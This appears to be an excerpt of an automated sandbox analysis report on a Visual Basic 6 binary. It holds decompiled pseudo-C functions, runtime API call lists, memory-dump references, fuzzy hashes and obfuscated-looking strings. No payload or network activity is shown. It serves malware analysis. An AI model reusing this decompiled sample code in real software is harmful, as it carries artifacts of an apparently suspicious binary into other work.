      				_v28 = _t125;
      				_v24 = 0x401470;
      				_v20 = 0;
      				_v16 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t122);
      				_v8 = 1;
      				_v8 = 2;
      				if(0 != 0) {
      					_v8 = 3;
      					L004017AA();
      					_v52 = __fp0;
      					_v8 = 4;
      					if( *0x4223c0 != 0) {
      						_v256 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v256 = 0x4223c0;
      					}
      					_v220 =  *_v256;
      					_t106 =  *((intOrPtr*)( *_v220 + 0x4c))(_v220,  &_v56);
      					asm("fclex");
      					_v224 = _t106;
      					if(_v224 >= 0) {
      						_v260 = _v260 & 0x00000000;
      					} else {
      						_push(0x4c);
      						_push(0x402590);
      						_push(_v220);
      						_push(_v224);
      						L004017C8();
      						_v260 = _t106;
      					}
      					_v228 = _v56;
      					_t110 =  *((intOrPtr*)( *_v228 + 0x28))(_v228);
      					asm("fclex");
      					_v232 = _t110;
      					if(_v232 >= 0) {
      						_v264 = _v264 & 0x00000000;
      					} else {
      						_push(0x28);
      						_push(0x402ecc);
      						_push(_v228);
      						_push(_v232);
      						L004017C8();
      						_v264 = _t110;
      					}
      					L004017C2();
      				}
      				_v8 = 6;
      				_v64 = 0x637f55;
      				_v72 = 3;
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xffffffff);
      				_push( &_v72);
      				L0040161E();
      				L0040183A();
      				L00401828();
      				_v8 = 7;
      				_v64 = 0x1f1c50;
      				_v72 = 3;
      				_push( &_v72);
      				_push( &_v88);
      				L00401678();
      				_v96 = 0xc1;
      				_v104 = 2;
      				_push( &_v104);
      				_push(0xe7);
      				_push( &_v88);
      				_push( &_v120);
      				L004015F4();
      				_v128 = 0x1a6490;
      				_v136 = 3;
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xffffffff);
      				_t91 =  &_v136;
      				_push(_t91);
      				L004015EE();
      				_v144 = _t91;
      				_v152 = 0x8008;
      				_push( &_v120);
      				_t93 =  &_v152;
      				_push(_t93);
      				L00401660();
      				_v220 = _t93;
      				_push( &_v152);
      				_push( &_v120);
      				_push( &_v136);
      				_push( &_v104);
      				_push( &_v88);
      				_push( &_v72);
      				_push(6);
      				L00401840();
      				_t100 = _v220;
      				if(_t100 != 0) {
      					_v8 = 8;
      					_push(0xffffffff);
      					L004016E4();
      					_v8 = 9;
      					_push(L"Cryptodeist");
      					L004017B0();
      					L0040183A();
      				}
      				_v8 = 0xb;
      				_v40 = 0x85ca67;
      				asm("wait");
      				_push(0x420a46);
      				L00401846();
      				L00401846();
      				return _t100;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420785
      • #535.MSVBVM60(?,?,?,?,00401546), ref: 004207CF
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00401546), ref: 004207F1
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,0000004C), ref: 00420853
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 004208A5
      • __vbaFreeObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 004208BC
      • #702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208E2
      • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208EC
      • __vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004208F4
      • #613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420916
      • #632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042093A
      • #704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 0042095F
      • __vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 0042097F
      • __vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004209AB
      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004209C7
      • #527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 004209D8
      • __vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 004209E2
      • __vbaFreeStr.MSVBVM60(00420A46), ref: 00420A38
      • __vbaFreeStr.MSVBVM60(00420A46), ref: 00420A40
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
      • String ID: Cryptodeist
      • API String ID: 3497234973-3010629389
      • Opcode ID: 821f027d8d59d624d42e7af7113e77a785a02b83fdf90218c519074561c4a1d7
      • Instruction ID: 32f9ce972ed43ce6ced16437ebc1781c13ca8861e626d3360c0f3d99aa6f1090
      • Opcode Fuzzy Hash: 821f027d8d59d624d42e7af7113e77a785a02b83fdf90218c519074561c4a1d7
      • Instruction Fuzzy Hash: 8A712971900218EBDB10EF95CE45BDEB7B8AF04314F6086AAE115B71E1DB785B48CF64
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 56%
      			E00420119(void* __ebx, void* __ecx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v24;
      				void* _v28;
      				void* _v32;
      				void* _v36;
      				void* _v40;
      				signed int _v44;
      				intOrPtr* _v48;
      				signed int _v52;
      				intOrPtr* _v60;
      				signed int _v64;
      				signed int _v68;
      				signed int _t39;
      				signed int _t43;
      				signed int _t49;
      				intOrPtr _t66;
      
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t66;
      				_t39 = 0x30;
      				L00401540();
      				_v12 = _t66;
      				_v8 = 0x4013e0;
      				L00401612();
      				L0040183A();
      				_push(_t39);
      				_push(L"Skimmia");
      				L0040172C();
      				asm("sbb eax, eax");
      				_v40 =  ~( ~_t39 + 1);
      				L00401846();
      				_t43 = _v40;
      				if(_t43 != 0) {
      					_push(0x47);
      					L00401786();
      					L0040183A();
      					if( *0x4223c0 != 0) {
      						_v60 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v60 = 0x4223c0;
      					}
      					_v40 =  *_v60;
      					_t49 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
      					asm("fclex");
      					_v44 = _t49;
      					if(_v44 >= 0) {
      						_v64 = _v64 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v40);
      						_push(_v44);
      						L004017C8();
      						_v64 = _t49;
      					}
      					_v48 = _v36;
      					_t43 =  *((intOrPtr*)( *_v48 + 0x138))(_v48, L"Printermanualen", 1);
      					asm("fclex");
      					_v52 = _t43;
      					if(_v52 >= 0) {
      						_v68 = _v68 & 0x00000000;
      					} else {
      						_push(0x138);
      						_push(0x4025b0);
      						_push(_v48);
      						_push(_v52);
      						L004017C8();
      						_v68 = _t43;
      					}
      					L004017C2();
      				}
      				_v24 = 0x5a4c00;
      				_push(0x420269);
      				L00401846();
      				return _t43;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420134
      • #669.MSVBVM60(?,?,?,?,00401546), ref: 00420146
      • __vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420150
      • __vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042015B
      • __vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042016E
      • #537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420181
      • __vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042018B
      • __vbaNew2.MSVBVM60(004025A0,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201A3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004201E7
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042022B
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042023C
      • __vbaFreeStr.MSVBVM60(00420269,Skimmia,00000000,?,?,?,?,00401546), ref: 00420263
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
      • String ID: Printermanualen$Skimmia
      • API String ID: 2004920347-2169568590
      • Opcode ID: aa435f65f6411465fba9e46cf251e6541e6ee100043346517f4f2c04f3e1966b
      • Instruction ID: 02f006f38bdf809f65cd51ea96890a5b1fd2d4245cefb2ebfb6a0586a8c405c6
      • Opcode Fuzzy Hash: aa435f65f6411465fba9e46cf251e6541e6ee100043346517f4f2c04f3e1966b
      • Instruction Fuzzy Hash: 1C311871A50218EFCB00EFA5D986BEDBBF4BF08704F60406AF501B61E1DBB95900CB29
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041EBF8
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EC22
      • __vbaVarDup.MSVBVM60 ref: 0041EC49
      • #607.MSVBVM60(?,000000BB,?), ref: 0041EC5B
      • __vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041EC64
      • __vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041EC6E
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041EC7D
      • #717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041EC9E
      • __vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECA7
      • __vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECB1
      • __vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041ECB9
      • __vbaFreeStr.MSVBVM60(0041ECFC,?,?,?,?,00401546), ref: 0041ECDB
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECE6
      • __vbaFreeStr.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECEE
      • __vbaFreeStr.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECF6
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
      • String ID:
      • API String ID: 1752509113-0
      • Opcode ID: 4b29d472cec14b0db805112cb1a39c9f5321520062d063b12ab11fbdc4f64d80
      • Instruction ID: b95eba25bacd7ca3d6c7bdb4dd5c54989d587c570b2574e24d603ff420ee1043
      • Opcode Fuzzy Hash: 4b29d472cec14b0db805112cb1a39c9f5321520062d063b12ab11fbdc4f64d80
      • Instruction Fuzzy Hash: 8531DE76900149ABDB00FBD1C986FDEB7B9AF04704F50843AB505B71E1EB786B09CB99
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E0041FA09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				void* _v32;
      				void* _v36;
      				char _v52;
      				char* _t24;
      				void* _t38;
      				void* _t40;
      				intOrPtr _t41;
      
      				_t41 = _t40 - 0xc;
      				 *[fs:0x0] = _t41;
      				L00401540();
      				_v16 = _t41;
      				_v12 = 0x4013c0;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401546, _t38);
      				L004017B6();
      				L004017B6();
      				_push( &_v52);
      				L00401636();
      				_t24 =  &_v52;
      				_push(_t24);
      				L00401834();
      				L0040183A();
      				L00401828();
      				L00401630();
      				_push(0x41fab1);
      				L00401846();
      				L00401846();
      				L00401846();
      				return _t24;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041FA25
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FA4F
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FA5A
      • #612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FA63
      • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA6C
      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA76
      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA7E
      • #554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA83
      • __vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FA9B
      • __vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FAA3
      • __vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FAAB
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$CopyMove$#554#612Chkstk
      • String ID:
      • API String ID: 3453574145-0
      • Opcode ID: eaae57431234c90587fcfc8ebe0cd9364a3d33e9b32d701d7c5814e7891d1866
      • Instruction ID: 693852dd8944fc207f73713524658091ffc1878156aa4315fcb4ed92e6621c0d
      • Opcode Fuzzy Hash: eaae57431234c90587fcfc8ebe0cd9364a3d33e9b32d701d7c5814e7891d1866
      • Instruction Fuzzy Hash: D211FA31910149ABCB04FFA2C986EDEB774BF04748F50853AB501771E1EB3CAA06CB98
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E00420E67(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				void* _v32;
      				short _v36;
      				char _v52;
      				char _v68;
      				char* _t29;
      				void* _t39;
      				void* _t41;
      				intOrPtr _t42;
      
      				_t42 = _t41 - 0xc;
      				 *[fs:0x0] = _t42;
      				L00401540();
      				_v16 = _t42;
      				_v12 = 0x4014d0;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401546, _t39);
      				L004017B6();
      				_push(0x5745);
      				_push( &_v52);
      				L0040167E();
      				_push( &_v52);
      				_push( &_v68);
      				L004015E2();
      				_push( &_v68);
      				L00401834();
      				L0040183A();
      				_push( &_v68);
      				_t29 =  &_v52;
      				_push(_t29);
      				_push(2);
      				L00401840();
      				_v36 = 0x253;
      				_push(0x420f23);
      				L00401846();
      				L00401846();
      				return _t29;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420E83
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420EAD
      • #698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 00420EBB
      • #520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 00420EC8
      • __vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420ED1
      • __vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420EDB
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420EEA
      • __vbaFreeStr.MSVBVM60(00420F23), ref: 00420F15
      • __vbaFreeStr.MSVBVM60(00420F23), ref: 00420F1D
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$#520#698ChkstkCopyList
      • String ID:
      • API String ID: 415313431-0
      • Opcode ID: b628ab3025051dbb522311c7f76f4921803e836e9b817ab5315d98a1f7a474c2
      • Instruction ID: b47ba6cb6cfe9537fd216ca96262c85262f1db123f7c31d4278a9a27857eaefe
      • Opcode Fuzzy Hash: b628ab3025051dbb522311c7f76f4921803e836e9b817ab5315d98a1f7a474c2
      • Instruction Fuzzy Hash: 6411DD72900218ABCB00FB91DD86EEEB7BCBF44748F54842AF501A71A1EB789605CB54
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F35D
      • #707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F385
      • __vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F38F
      • #593.MSVBVM60(0000000A), ref: 0041F3AC
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041F3B7
      • #537.MSVBVM60(0000003B,0000000A), ref: 0041F3BE
      • __vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F3C8
      • __vbaFreeStr.MSVBVM60(0041F3EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F3E1
      • __vbaFreeStr.MSVBVM60(0041F3EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F3E9
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$#537#593#707Chkstk
      • String ID:
      • API String ID: 2467297632-0
      • Opcode ID: 316b31308a43112fef42106b2f5cd699d70758ed15948049cee89f217091de0c
      • Instruction ID: ca640c03beec4af6d082099bc43d86ae2034aa72d58194d0da08468fb277227d
      • Opcode Fuzzy Hash: 316b31308a43112fef42106b2f5cd699d70758ed15948049cee89f217091de0c
      • Instruction Fuzzy Hash: 59113071A40209ABDB01FBA1CC86BDE7BB4AF00708F10843AF501BB1E1DB7C9645CB99
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 62%
      			E0041ED1B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				void* _v32;
      				long long _v40;
      				char _v48;
      				signed char _t22;
      				void* _t29;
      				void* _t31;
      				intOrPtr _t32;
      
      				_t32 = _t31 - 0xc;
      				 *[fs:0x0] = _t32;
      				L00401540();
      				_v16 = _t32;
      				_v12 = 0x401358;
      				_v8 = 0;
      				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401546, _t29);
      				L004017B6();
      				asm("fabs");
      				asm("fnstsw ax");
      				if((_t22 & 0x0000000d) != 0) {
      					return __imp____vbaFPException();
      				}
      				L00401666();
      				_v40 = __fp0;
      				_v48 = 5;
      				__eax =  &_v48;
      				_push(__eax);
      				L0040166C();
      				L0040183A();
      				L00401828();
      				asm("wait");
      				_push(0x41edc0);
      				L00401846();
      				L00401846();
      				return __eax;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041ED37
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041ED61
      • __vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041ED74
      • #536.MSVBVM60(00000005), ref: 0041ED87
      • __vbaStrMove.MSVBVM60(00000005), ref: 0041ED91
      • __vbaFreeVar.MSVBVM60(00000005), ref: 0041ED99
      • __vbaFreeStr.MSVBVM60(0041EDC0,00000005), ref: 0041EDB2
      • __vbaFreeStr.MSVBVM60(0041EDC0,00000005), ref: 0041EDBA
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$#536ChkstkCopyMove
      • String ID:
      • API String ID: 983360083-0
      • Opcode ID: 552b9a0e46c1e401c01f65e268d5356e34434584d4332fbea828098f5c8dbf55
      • Instruction ID: bcc319732d83193761566249f4410b334ff801331151ac71e4b9571fc2eee605
      • Opcode Fuzzy Hash: 552b9a0e46c1e401c01f65e268d5356e34434584d4332fbea828098f5c8dbf55
      • Instruction Fuzzy Hash: 6B115E35800209ABCB00FFA6D846BDE7BB4BF45748F10846AF401771E1DB3C9A45CB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E0042129F() {
      				signed int _v8;
      				signed int _t8;
      				char _t10;
      				signed int _t13;
      				intOrPtr _t15;
      				intOrPtr _t17;
      
      				_push(4);
      				L00401540();
      				_t8 = 1;
      				_t13 = 1;
      				_t15 =  *0x422034; // 0x705630
      				_t17 =  *0x422034; // 0x705630
      				_t10 =  *((intOrPtr*)(_t17 + _t8 * 0xffffffff));
      				 *((char*)(_t15 + _t13 * 0xffffffff)) = _t10;
      				_push( *0x422034);
      				L004015D0();
      				 *0x422040 = _t10;
      				_v8 = _v8 | 0x0000ffff;
      				 *0x422044 = _v8;
      				return _v8;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,0041D72D), ref: 004212A5
      • #644.MSVBVM60(?,?,0041D72D), ref: 004212CF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: #644Chkstk__vba
      • String ID: 0Vp
      • API String ID: 3537395942-1741600620
      • Opcode ID: fd2af8f999a0c8f39f5a35538a94ba737fded3850314be441f7a0be846c259b9
      • Instruction ID: a8e23d06acab7e75d8665402ef0bb63053a8901cb422af0ba97e5d0c302f9eae
      • Opcode Fuzzy Hash: fd2af8f999a0c8f39f5a35538a94ba737fded3850314be441f7a0be846c259b9
      • Instruction Fuzzy Hash: FEF0E539202741BAC7386B65AF126D6BB78AF49750F50006AFB01AF2F1E7B05A42D75C
      Uniqueness

      Uniqueness Score: -1.00%